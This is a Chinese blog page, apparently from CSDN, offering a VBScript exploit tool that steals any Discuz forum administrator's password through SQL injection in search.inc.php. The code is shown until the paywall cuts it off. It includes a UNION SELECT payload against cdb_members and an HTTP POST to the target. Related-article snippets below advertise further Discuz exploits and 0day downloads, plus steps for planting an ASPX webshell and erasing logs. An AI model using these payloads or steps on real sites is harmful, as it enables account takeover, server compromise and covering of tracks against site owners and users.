discuz获取任意管理员密码漏洞利用工具vbs版

最新推荐文章于 2025-11-29 16:24:14 发布
原创 最新推荐文章于 2025-11-29 16:24:14 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#工具 #python #action #path #wap

本文提供了一个VBS版本的Discuz获取任意管理员密码的漏洞利用工具。通过修改并运行代码,可以利用search.inc.php文件中的漏洞,获取指定UID的管理员密码。用户需提供站点地址、路径和UID,程序会将结果输出到result.txt文件中。
 本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版 
 
也利于修改 
 
以下是search.inc.php 文件漏洞利用代码VBS版 
 
 
Dim strUrl,strSite,strPath,strUid 
 
showB() 
Set Args = Wscript.Arguments 
 
If Args.Count <> 3 Then 
ShowU() 
Else 
strSite=Args(0) 
strPath=Args(1) 
strUid=Args(2) 
End If 
 
strUrl="action=search&searchid=22%cf’ UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" 
 
   Set objXML = CreateObject("Microsoft.XMLHTTP") 
   objXML.Open "POST",strSite & strPath & "index.php", False 
   objXML.SetRequestHeader "Accept", "*/*" 
   objXML.SetRequestHeader "Accept-Language", "zh-cn" 
   objXML.SetRequestHeader "Content-Typ
最低0.47元/天 解锁文章
Python编写的Discuz本faq.php注入漏洞利用工具】- 详细解析与源代码
CyberNerdX的博客
10-03 264
工具利用Discuz本faq.php中的注入漏洞,通过构造恶意的输入参数,将SQL查询语句注入到数据库查询中。该工具利用faq.php文件中的注入漏洞,通过构造恶意的输入参数,实现对目标网站的数据库执行恶意操作。Discuz是一种广泛使用的PHP开源论坛系统,然而,在早期的Discuz本中,存在一个名为faq.php的文件,该文件存在注入漏洞。本文将详细解析一种使用Python编写的Discuz本faq.php注入漏洞利用工具,帮助读者理解该漏洞利用原理和实际操作过程。
2022-10-08(Discuz漏洞、FCKeditor文本编辑器漏洞、ZooKeeper 未授权访问、Memcahe 未授权访问)
qq_45751902的博客
10-08 3034
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。默认安装配置完的zookeeper。不可以上传文件,可点击上传图片按钮,再选择浏览服务器即可跳转到可上传文件页,可查看已经上传的文件(前提是/FCKeditor/editor/fckeditor.html 页面存在)memcache未授权访问漏洞,默认的 11211 端口不需要密码即可访问,攻击者可获取数据库中信息,造成严重的信息泄露。
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
政政Discuz!NT 2.5.0 漏洞利用工具 1
02-11
软件名:政政Discuz!NT 2.5.0 漏洞利用工具 1.0 程序帮助: 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号,提权成为管理员 3、更新ASPX为可上传,主要是为了上传ASPX木马的 4、去发表一个帖子,把你的ASPX木马上传上去。 5、去后台找附件的绝对路径,登陆你的ASPX木马 6、删除前台自己发的帖子,保留附件 7、更新ASPX不可上传,取后门 8、删除自己的相关日志 9、取消自己的管理员身份 10、完毕,成功拿到一台webshell ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!
discuz faq.php,Python Discuz 7.2 faq.php 注入漏洞全自动利用工具
weixin_42512798的博客
03-10 221
#!/usr/bin/envpython#-*-coding:gbk-*-#-*-coding:gb2312-*-#-*-coding:utf_8-*-#authoriswinimportsysimporthashlibimporttimeimportmathimportbase64importurllib2importurllibimportrede...
discuz 任意管理员密码漏洞利用工具 vbs代码
09-05
在这个特定的情况下,我们讨论的是一个针对 Discuz 管理员密码漏洞利用工具,该工具是用 VBScript (Visual Basic Script) 编写的。VBScript 是一种轻量级的脚本语言,常用于 Windows 环境中的自动化任务和网页交互...
discuz 修改创始人密码管理员登录密码的方法
09-28
本文将详细介绍如何在 Discuz 中修改创始人密码以及管理员登录密码。 首先,我们来讨论如何修改管理员登录密码。这个过程相对直观,但可能对初学者来说不太明显。以下步骤将指导你完成这一过程: 1. 首先,你需要...
DISCUZ 论坛管理员密码忘记的解决方法
10-29
综上所述,对于DISCUZ论坛管理员密码忘记的情况,可以通过修改存储在数据库中的加密密码来解决问题。由于密码经过了加密处理,必须使用相同的加密算法对新密码进行加密后才能进行替换。此外,管理员在操作数据库时应...
网络安全实战之discuz上传漏洞利用
weixin_44255593的博客
02-16 8300
攻击思路: 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器本,操作系统本。找漏洞 2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权 3、传上去后,得到apache用户普通权限,再提权成root 概述: 这突破在一个DZ X系列自带的转换工具里面。 漏洞路径:utility / convert / data / config.inc.php 漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
吾名招财的博客
06-22 3741
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
dz 0day漏洞大家快啊
06-07
dz 0day漏洞 啊 下载吧 大力支持 啊
如何通过Python暴力破解网站登陆密码
weixin_30772261的博客
06-10 5344
首先申明,该文章只可以用于交流学习,不可以用于其他用途,否则后果自负。 现在国家对网络安全的管理,越来越严,但是还是有一些不法网站逍遥法外,受限于国内的人力、物力,无法对这些网站进行取缔。 今天演示的这个网站,就是属于非法的网站。 首先看登陆界面。 抓取登陆信息。 使用Post Form表单的形式,进行用户名和密码的提交。接下来我们看提交的用户名和密码。 我输...
Discuz! 6.0.0 0Day漏洞
weixin_33936401的博客
11-26 1306
来源:坏狼安全网// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) {@extract($_POST, EXTR_S...
Discuz!各本拿Webshell
weixin_34313182的博客
04-01 1007
四个本的漏洞Discuz! 6.0 、7.0、7.2和X1.5。 传X1.5出0day,最后神马也木见……后t00ls大牛淫们发出了方法和EXP,围观下。 ———————————————– 作者:jsbug 原文地址 长文短说,但是却说来文长。 一、 Discuz! 6.0 和 Discuz! 7.0 既然要后台拿Shell,文件写入必看。 /i...
discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造攻击利用与修复
网站安全专家
12-10 9909
2018年12月9日,国内某安全组织,对discuz X3.2 X3.4本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞discuz 的用户前段SQL注入与请求伪造漏洞,也俗称SSRF漏洞漏洞产生的原因首先:php环境的本大约PHP5.2,dizcuzX3.2 X3.4本,服务器环境是windows 2008 2003 2012系统,linux centos不受此漏洞的影响。 漏...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Python Pandas多列合并成一长列(扁平化)
最新发布
视觉算法小趴菜的博客
11-29 429
本文介绍了Pandas中三种数据扁平化方法:melt()按变量名和值两列重组数据,concat()垂直拼接多列,stack()将多列转为单列。测试数据显示melt()保留原列名信息,concat()和stack()仅保留数值。三种方法各有特点,适用于不同的数据扁平化需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值